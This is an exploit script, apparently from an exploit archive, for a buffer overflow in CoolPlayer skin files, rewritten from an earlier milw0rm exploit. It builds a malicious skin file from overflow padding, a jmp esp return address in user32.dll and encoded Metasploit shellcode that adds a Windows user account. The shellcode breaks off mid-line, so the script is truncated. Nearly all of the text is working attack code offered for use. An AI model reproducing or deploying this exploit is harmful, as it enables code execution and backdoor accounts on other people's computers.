1 # CoolPlayer (Skin) Buffer Overflow
2 # maybe all versions are affected :)
3 # By:Encrypt3d.M!nd
4 #
5 # Orginal Exploit: by r0ut3r
6 # http://www.milw0rm.com/exploits/7536
7 #
8 # i’ve test it on my box(winxp sp3) and didn’t work
9 # so i’ve re−wrote the exploit and this is workin
10 # tested: Windows xp sp3 patched
11 # version tested:2.17,2.18,2.19
12 #
13 # Greetz:−=Mizo=−,L!0n,El Mariachi,MiNi SpIder,GGy,and all my friends
14 ###################################################
15
16 chars = "A"*1511
17
18 eip = "\x6B\x8C\x49\x7E" #user32.dll jmp esp
19
20 header = "[CoolPlayer Skin]\nPlaylistSkin="
21
22
23 # win32_adduser − PASS=t35t EXITFUNC=seh USER=t35t Size=489
24 Encoder=PexAlphaNum http://metasploit.com
25 shellcode = (
26 "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
27 "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
28 "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
29 "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
30 "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34"
31 "\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x44\x4e\x43\x4b\x38\x4e\x57"
32 "\x45\x50\x4a\x47\x41\x30\x4f\x4e\x4b\x38\x4f\x54\x4a\x31\x4b\x38"
33 "\x4f\x45\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x38\x46\x53\x4b\x38"
34 "\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x58\x42\x4c"
35 "\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"
36 "\x46\x4f\x4b\x33\x46\x45\x46\x52\x46\x50\x45\x47\x45\x4e\x4b\x58"
37 "\x4f\x45\x46\x42\x41\x50\x4b\x4e\x48\x56\x4b\x48\x4e\x50\x4b\x34"
38 "\x4b\x58\x4f\x45\x4e\x51\x41\x30\x4b\x4e\x4b\x38\x4e\x41\x4b\x58"
39 "\x41\x50\x4b\x4e\x49\x48\x4e\x55\x46\x32\x46\x50\x43\x4c\x41\x43"
40 "\x42\x4c\x46\x56\x4b\x58\x42\x54\x42\x43\x45\x38\x42\x4c\x4a\x37"
41 "\x4e\x30\x4b\x38\x42\x34\x4e\x50\x4b\x38\x42\x37\x4e\x41\x4d\x4a"
42 "\x4b\x58\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x58\x42\x38\x42\x4b"
43 "\x42\x50\x42\x50\x42\x30\x4b\x48\x4a\x46\x4e\x33\x4f\x35\x41\x33"
44 "\x48\x4f\x42\x56\x48\x35\x49\x38\x4a\